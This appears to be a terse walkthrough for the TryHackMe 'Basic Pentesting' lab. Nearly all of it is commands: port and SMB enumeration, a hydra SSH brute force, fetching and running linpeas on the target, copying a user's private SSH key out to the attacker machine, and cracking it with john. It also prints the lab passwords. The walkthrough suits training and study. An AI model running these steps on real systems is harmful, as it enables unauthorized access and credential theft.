Basic Pentesting

Room Link: https://tryhackme.com/room/basicpentestingjt

Scanning

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

HTTP port 80

dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt

SMB port 139

Kali

nmap $VICTIM --script=smb-enum*

Kali

smbclient -L //$VICTIM/ -U anonymous

We found a file that has two possible usernames. In the note above it mentioned someone with J in their name has a weak password.

Kali

smbclient \\\\$VICTIM\\Anonymous -U anonymous
prompt
mget *
exit
cat staff.txt

SSH port 22

Kali

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$VICTIM

Kali

ssh jan@$VICTIM
Password: armando

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Victim

ls -lah /home/kay/.ssh/

Victim

scp id_rsa root@$KALI:/root/loot

It is password protected so we need to try to get the password from john

Kali

chmod 400 id_rsa 
ssh -i id_rsa kay@$VICTIM

Kali

/opt/john/ssh2john.py id_rsa > pass_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass_hash.txt

Kali

ssh -i id_rsa kay@$VICTIM
Password: beeswax

Victim

cat pass.bak